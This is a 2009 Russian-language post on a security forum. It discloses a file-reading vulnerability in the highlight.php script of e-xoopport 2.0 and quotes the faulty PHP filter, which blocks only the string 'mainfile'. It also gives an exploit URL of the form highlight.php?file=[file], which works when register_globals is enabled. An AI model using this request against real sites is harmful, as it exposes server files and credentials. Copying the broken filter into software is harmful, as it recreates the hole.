07.01.2009, 12:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
С нами:
9389186
Репутация:
573
|
|
ух что я нашел)
Присутствует в e-xoopport v 2.0
Уязвимость в скрипте highlight.php
PHP код:
if (preg_match('/mainfile/i', $_GET['file'])) {
redirect_header(XOOPS_URL . '/', 3, "Ах ты Подлый хахер");
exit();
}
данная конструкция пошлет нас если мы передадим ?file=mainfile. И все(очевидно создатели забыли про "!"). Это не есть пример хорошего фильтра. А далее переменная участвует в опасной функции. Результат
При регистр глобалс = Он мы можем:
Код:
http://localhost/class/debug/highlight.php?file=[file]
Иногда требуется авторизация
Последний раз редактировалось The matrix; 11.02.2009 в 19:22..
|
|
|